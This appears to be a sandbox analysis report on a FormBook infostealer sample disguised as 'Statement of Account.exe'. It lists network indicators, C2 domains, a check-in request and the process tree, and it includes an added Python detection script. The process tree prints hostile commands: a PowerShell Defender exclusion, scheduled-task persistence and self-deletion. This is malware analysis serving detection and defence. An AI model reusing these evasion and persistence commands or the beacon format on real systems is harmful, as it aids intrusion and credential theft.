                                                                                                                                                Time Stamp:0x67023AB0 [Sun Oct 6 07:22:24 2024 UTC]
                                                                                                                                                TLS Callbacks:
                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                OS Version Major:4
                                                                                                                                                OS Version Minor:0
                                                                                                                                                File Version Major:4
                                                                                                                                                File Version Minor:0
                                                                                                                                                Subsystem Version Major:4
                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                Instruction
                                                                                                                                                jmp dword ptr [00402000h]
                                                                                                                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa9254 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xaa000 | 0x41e4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb0000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xa72ac | 0xa7400 | 510e5017ba74d035d3b0880429de19ea | False | 0.9224676522795217 | data | 7.785000969686177 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xaa000 | 0x41e4 | 0x4200 | 10eb7c9833ad1149807bf1b78241fee5 | False | 0.9679805871212122 | data | 7.854457862971447 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xb0000 | 0xc | 0x200 | c1e3c5dbeadfd1c347c93692cc9c632f | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xaa0c8 | 0x3df6 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 1.0006934812760055
RT_GROUP_ICON | 0xaded0 | 0x14 | data | | | 1.05
RT_VERSION | 0xadef4 | 0x2ec | data | | | 0.43716577540106955
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-28T15:35:40.784783+0100 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 49980 | 85.13.166.18 | 80 | TCP
2024-10-28T15:35:40.784783+0100 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 49980 | 85.13.166.18 | 80 | TCP
2024-10-28T15:35:40.784783+0100 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.4 | 49980 | 85.13.166.18 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 28, 2024 15:35:40.161206961 CET | 49980 | 80 | 192.168.2.4 | 85.13.166.18
Oct 28, 2024 15:35:40.166800976 CET | 80 | 49980 | 85.13.166.18 | 192.168.2.4
Oct 28, 2024 15:35:40.169220924 CET | 49980 | 80 | 192.168.2.4 | 85.13.166.18
Oct 28, 2024 15:35:40.169220924 CET | 49980 | 80 | 192.168.2.4 | 85.13.166.18
Oct 28, 2024 15:35:40.174761057 CET | 80 | 49980 | 85.13.166.18 | 192.168.2.4
Oct 28, 2024 15:35:40.655363083 CET | 49980 | 80 | 192.168.2.4 | 85.13.166.18
Oct 28, 2024 15:35:40.703928947 CET | 80 | 49980 | 85.13.166.18 | 192.168.2.4
Oct 28, 2024 15:35:40.784729004 CET | 80 | 49980 | 85.13.166.18 | 192.168.2.4
Oct 28, 2024 15:35:40.784782887 CET | 49980 | 80 | 192.168.2.4 | 85.13.166.18
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 28, 2024 15:34:39.937114000 CET | 55015 | 53 | 192.168.2.4 | 1.1.1.1
Oct 28, 2024 15:34:40.029696941 CET | 53 | 55015 | 1.1.1.1 | 192.168.2.4
Oct 28, 2024 15:35:19.468626022 CET | 62634 | 53 | 192.168.2.4 | 1.1.1.1
Oct 28, 2024 15:35:19.479779959 CET | 53 | 62634 | 1.1.1.1 | 192.168.2.4
Oct 28, 2024 15:35:39.702089071 CET | 62896 | 53 | 192.168.2.4 | 1.1.1.1
Oct 28, 2024 15:35:40.159903049 CET | 53 | 62896 | 1.1.1.1 | 192.168.2.4
Oct 28, 2024 15:36:00.155524969 CET | 51125 | 53 | 192.168.2.4 | 1.1.1.1
Oct 28, 2024 15:36:00.165750980 CET | 53 | 51125 | 1.1.1.1 | 192.168.2.4
Oct 28, 2024 15:36:20.564344883 CET | 51919 | 53 | 192.168.2.4 | 1.1.1.1
Oct 28, 2024 15:36:20.576421022 CET | 53 | 51919 | 1.1.1.1 | 192.168.2.4
Oct 28, 2024 15:36:41.282382965 CET | 51500 | 53 | 192.168.2.4 | 1.1.1.1
Oct 28, 2024 15:36:41.292824030 CET | 53 | 51500 | 1.1.1.1 | 192.168.2.4
Oct 28, 2024 15:37:02.174412012 CET | 52548 | 53 | 192.168.2.4 | 1.1.1.1
Oct 28, 2024 15:37:02.191540956 CET | 53 | 52548 | 1.1.1.1 | 192.168.2.4
Oct 28, 2024 15:37:22.945727110 CET | 64887 | 53 | 192.168.2.4 | 1.1.1.1
Oct 28, 2024 15:37:22.956568003 CET | 53 | 64887 | 1.1.1.1 | 192.168.2.4
Oct 28, 2024 15:37:43.843712091 CET | 62150 | 53 | 192.168.2.4 | 1.1.1.1
Oct 28, 2024 15:37:43.854929924 CET | 53 | 62150 | 1.1.1.1 | 192.168.2.4
Oct 28, 2024 15:38:04.365607977 CET | 65504 | 53 | 192.168.2.4 | 1.1.1.1
Oct 28, 2024 15:38:04.463583946 CET | 53 | 65504 | 1.1.1.1 | 192.168.2.4
Oct 28, 2024 15:38:25.202491999 CET | 55488 | 53 | 192.168.2.4 | 1.1.1.1
Oct 28, 2024 15:38:25.295370102 CET | 53 | 55488 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 28, 2024 15:34:39.937114000 CET | 192.168.2.4 | 1.1.1.1 | 0x6a02 | Standard query (0) | www.yzq0n.top | A (IP address) | IN (0x0001) | false
Oct 28, 2024 15:35:19.468626022 CET | 192.168.2.4 | 1.1.1.1 | 0x84b3 | Standard query (0) | www.eb777.club | A (IP address) | IN (0x0001) | false
Oct 28, 2024 15:35:39.702089071 CET | 192.168.2.4 | 1.1.1.1 | 0x6ce7 | Standard query (0) | www.irex.info | A (IP address) | IN (0x0001) | false
Oct 28, 2024 15:36:00.155524969 CET | 192.168.2.4 | 1.1.1.1 | 0xe033 | Standard query (0) | www.urgaslotvip.website | A (IP address) | IN (0x0001) | false
Oct 28, 2024 15:36:20.564344883 CET | 192.168.2.4 | 1.1.1.1 | 0x42a9 | Standard query (0) | www.nd-los.net | A (IP address) | IN (0x0001) | false
Oct 28, 2024 15:36:41.282382965 CET | 192.168.2.4 | 1.1.1.1 | 0x7e56 | Standard query (0) | www.azino-forum-pro.online | A (IP address) | IN (0x0001) | false
Oct 28, 2024 15:37:02.174412012 CET | 192.168.2.4 | 1.1.1.1 | 0x362b | Standard query (0) | www.sed-cars-89003.bond | A (IP address) | IN (0x0001) | false
Oct 28, 2024 15:37:22.945727110 CET | 192.168.2.4 | 1.1.1.1 | 0xbb16 | Standard query (0) | www.kdsclci.bond | A (IP address) | IN (0x0001) | false
Oct 28, 2024 15:37:43.843712091 CET | 192.168.2.4 | 1.1.1.1 | 0x431b | Standard query (0) | www.leachlondonstore.online | A (IP address) | IN (0x0001) | false
Oct 28, 2024 15:38:04.365607977 CET | 192.168.2.4 | 1.1.1.1 | 0x6c24 | Standard query (0) | www.f6b-crxy.top | A (IP address) | IN (0x0001) | false
Oct 28, 2024 15:38:25.202491999 CET | 192.168.2.4 | 1.1.1.1 | 0x8dd4 | Standard query (0) | www.hopp9.top | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 28, 2024 15:34:40.029696941 CET | 1.1.1.1 | 192.168.2.4 | 0x6a02 | Name error (3) | www.yzq0n.top | none | none | A (IP address) | IN (0x0001) | false
Oct 28, 2024 15:35:19.479779959 CET | 1.1.1.1 | 192.168.2.4 | 0x84b3 | Name error (3) | www.eb777.club | none | none | A (IP address) | IN (0x0001) | false
Oct 28, 2024 15:35:40.159903049 CET | 1.1.1.1 | 192.168.2.4 | 0x6ce7 | No error (0) | www.irex.info |  | 85.13.166.18 | A (IP address) | IN (0x0001) | false
Oct 28, 2024 15:36:00.165750980 CET | 1.1.1.1 | 192.168.2.4 | 0xe033 | Name error (3) | www.urgaslotvip.website | none | none | A (IP address) | IN (0x0001) | false
Oct 28, 2024 15:36:20.576421022 CET | 1.1.1.1 | 192.168.2.4 | 0x42a9 | Name error (3) | www.nd-los.net | none | none | A (IP address) | IN (0x0001) | false
Oct 28, 2024 15:36:41.292824030 CET | 1.1.1.1 | 192.168.2.4 | 0x7e56 | Name error (3) | www.azino-forum-pro.online | none | none | A (IP address) | IN (0x0001) | false
Oct 28, 2024 15:37:02.191540956 CET | 1.1.1.1 | 192.168.2.4 | 0x362b | Name error (3) | www.sed-cars-89003.bond | none | none | A (IP address) | IN (0x0001) | false
Oct 28, 2024 15:37:22.956568003 CET | 1.1.1.1 | 192.168.2.4 | 0xbb16 | Name error (3) | www.kdsclci.bond | none | none | A (IP address) | IN (0x0001) | false
Oct 28, 2024 15:37:43.854929924 CET | 1.1.1.1 | 192.168.2.4 | 0x431b | Name error (3) | www.leachlondonstore.online | none | none | A (IP address) | IN (0x0001) | false
Oct 28, 2024 15:38:04.463583946 CET | 1.1.1.1 | 192.168.2.4 | 0x6c24 | Name error (3) | www.f6b-crxy.top | none | none | A (IP address) | IN (0x0001) | false
Oct 28, 2024 15:38:25.295370102 CET | 1.1.1.1 | 192.168.2.4 | 0x8dd4 | Name error (3) | www.hopp9.top | none | none | A (IP address) | IN (0x0001) | false
                                                                                                                                                • www.irex.info
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49980 | 85.13.166.18 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 15:35:40.169220924 CET | 161 | OUT | GET /cu29/?C8=IwPUjMzkOEAD01hGKscrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZOMdBCeeTibo&QZ0=dhoHn4gPjl4PNT HTTP/1.1
Host: www.irex.info
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
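The DNS and HTTP tables above show the pattern the Suricata alert fires on: the injected explorer.exe walks a list of eleven domains, ten of them return NXDOMAIN, and the single one that resolves (www.irex.info, 85.13.166.18) receives a GET with a short one-directory path, two short query keys, a Host header and Connection: close. The Python below is an added example, not Joe Sandbox's or the report's own code: it reproduces both signals on records constructed to mirror those tables and correlates them. The NXDOMAIN thresholds, the path regex and the parameter-key length limit are assumptions, not published rule logic.

```python
"""Added example: flag FormBook-style beaconing from DNS answers plus an HTTP
request. Not Joe Sandbox code; records are constructed from the report's
tables and every threshold below is an assumption."""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

# Constructed DNS answers (client, name, rcode, address) mirroring the report:
# ten NXDOMAIN (rcode 3) replies and one name that resolves (rcode 0).
DNS_ANSWERS = [
    ("192.168.2.4", "www.yzq0n.top", 3, None),
    ("192.168.2.4", "www.eb777.club", 3, None),
    ("192.168.2.4", "www.irex.info", 0, "85.13.166.18"),
    ("192.168.2.4", "www.urgaslotvip.website", 3, None),
    ("192.168.2.4", "www.nd-los.net", 3, None),
    ("192.168.2.4", "www.azino-forum-pro.online", 3, None),
    ("192.168.2.4", "www.sed-cars-89003.bond", 3, None),
    ("192.168.2.4", "www.kdsclci.bond", 3, None),
    ("192.168.2.4", "www.leachlondonstore.online", 3, None),
    ("192.168.2.4", "www.f6b-crxy.top", 3, None),
    ("192.168.2.4", "www.hopp9.top", 3, None),
]

# Constructed request as the report shows it: request line, two headers, the
# blank line and seven NUL bytes of body, 161 bytes in total.
HTTP_REQUEST = (
    b"GET /cu29/?C8=IwPUjMzkOEAD01hGKscrKmKp5P8dDDiJJg1OEW3Oajc2fvmWhIoIvoJUZOMdBCeeTibo"
    b"&QZ0=dhoHn4gPjl4PNT HTTP/1.1\r\n"
    b"Host: www.irex.info\r\nConnection: close\r\n\r\n" + b"\x00" * 7
)

@dataclass
class ClientDns:
    queried: int = 0
    nxdomain: int = 0
    resolved: dict = field(default_factory=dict)  # name -> address

def summarize_dns(answers, nx_threshold=5, min_nx_ratio=0.8):
    """Group answers per client and flag clients whose queries mostly fail.
    Returns (per_client, flagged); thresholds are assumed values."""
    per_client = defaultdict(ClientDns)
    for client, name, rcode, addr in answers:
        c = per_client[client]
        c.queried += 1
        if rcode == 3:
            c.nxdomain += 1
        elif rcode == 0 and addr:
            c.resolved[name] = addr
    flagged = {
        client: c for client, c in per_client.items()
        if c.nxdomain >= nx_threshold and c.nxdomain / c.queried >= min_nx_ratio
    }
    return dict(per_client), flagged

_PATH_RE = re.compile(r"^/[A-Za-z0-9]{2,8}/$")  # assumed shape of the check-in path

def parse_checkin(raw: bytes):
    """Parse a minimal HTTP/1.1 request and return its C2 details if it has the
    check-in shape from the report (GET, one-directory path, exactly two short
    query keys, Host present, Connection: close), else None. Heuristic only."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("ascii", "replace").split("\r\n")
    method, target, _version = lines[0].split(" ")
    headers = {}
    for line in lines[1:]:
        k, _, v = line.partition(":")
        headers[k.strip().lower()] = v.strip()
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    if not (method == "GET" and _PATH_RE.match(parts.path) and len(params) == 2
            and all(len(k) <= 3 for k in params) and "host" in headers
            and headers.get("connection", "").lower() == "close"):
        return None
    return {"host": headers["host"], "path": parts.path,
            "params": {k: v[0] for k, v in params.items()}, "body_len": len(body)}

def correlate(answers, raw_request):
    """Tie the signals together: the check-in is high confidence only when its
    Host is the one name that resolved for a client with NXDOMAIN churn."""
    _per_client, flagged = summarize_dns(answers)
    hit = parse_checkin(raw_request)
    if hit is None:
        return []
    return [(client, hit["host"], c.resolved[hit["host"]])
            for client, c in flagged.items() if hit["host"] in c.resolved]

if __name__ == "__main__":
    for client, host, addr in correlate(DNS_ANSWERS, HTTP_REQUEST):
        print(f"{client}: FormBook-style check-in to {host} ({addr})")
```

The body length is worth keeping in the result: the report's 161 transferred bytes are the request line, two headers, the blank line and seven NUL bytes, so a signature keyed only on headers would miss a variant that pads differently. To run this against real Zeek or Suricata DNS and HTTP logs, map their fields onto the tuples and byte string above.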


Target ID: 0
Start time: 10:33:59
Start date: 28/10/2024
Path: C:\Users\user\Desktop\Statement of Account.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Statement of Account.exe"
Imagebase: 0xb20000
File size: 702'976 bytes
MD5 hash: D034873F3CA1528CD660316E6BBE8C14
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low
Has exited: true

Target ID: 2
Start time: 10:34:01
Start date: 28/10/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SIZfuXT.exe"
Imagebase: 0x30000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 10:34:01
Start date: 28/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 10:34:01
Start date: 28/10/2024
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpC2DD.tmp"
Imagebase: 0xbb0000
File size: 187'904 bytes
MD5 hash: 48C2FE20575769DE916F48EF0676A965
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 10:34:01
Start date: 28/10/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 10:34:01
Start date: 28/10/2024
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
Imagebase: 0xe80000
File size: 2'625'616 bytes
MD5 hash: 0A7608DB01CAE07792CEA95E792AA866
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate
Has exited: true

                                                                                                                                                Target ID:7
                                                                                                                                                Start time:10:34:02
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                Imagebase:0x7ff72b770000
                                                                                                                                                File size:5'141'208 bytes
                                                                                                                                                MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000007.00000002.4176622170.000000000E808000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:false

                                                                                                                                                Target ID:8
                                                                                                                                                Start time:10:34:02
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Users\user\AppData\Roaming\SIZfuXT.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:C:\Users\user\AppData\Roaming\SIZfuXT.exe
                                                                                                                                                Imagebase:0xe00000
                                                                                                                                                File size:702'976 bytes
                                                                                                                                                MD5 hash:D034873F3CA1528CD660316E6BBE8C14
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Antivirus matches:
                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                • Detection: 76%, ReversingLabs
                                                                                                                                                Reputation:low
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:9
                                                                                                                                                Start time:10:34:03
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                Imagebase:0x7ff693ab0000
                                                                                                                                                File size:496'640 bytes
                                                                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:false

                                                                                                                                                Target ID:10
                                                                                                                                                Start time:10:34:05
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SIZfuXT" /XML "C:\Users\user\AppData\Local\Temp\tmpCFFD.tmp"
                                                                                                                                                Imagebase:0xbb0000
                                                                                                                                                File size:187'904 bytes
                                                                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:11
                                                                                                                                                Start time:10:34:05
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:12
                                                                                                                                                Start time:10:34:05
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                                                                                Imagebase:0xe80000
                                                                                                                                                File size:2'625'616 bytes
                                                                                                                                                MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:13
                                                                                                                                                Start time:10:34:06
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:"C:\Windows\SysWOW64\NETSTAT.EXE"
                                                                                                                                                Imagebase:0xc30000
                                                                                                                                                File size:32'768 bytes
                                                                                                                                                MD5 hash:9DB170ED520A6DD57B5AC92EC537368A
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                Reputation:moderate
                                                                                                                                                Has exited:false

                                                                                                                                                Target ID:14
                                                                                                                                                Start time:10:34:06
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\autochk.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Windows\SysWOW64\autochk.exe"
                                                                                                                                                Imagebase:0xb40000
                                                                                                                                                File size:863'232 bytes
                                                                                                                                                MD5 hash:FC398299F54290D5F35C69E865FD7CC2
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Has exited:true

                                                                                                                                                Target ID:15
                                                                                                                                                Start time:10:34:09
                                                                                                                                                Start date:28/10/2024
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                                                                                Imagebase:0x240000
                                                                                                                                                File size:236'544 bytes
                                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
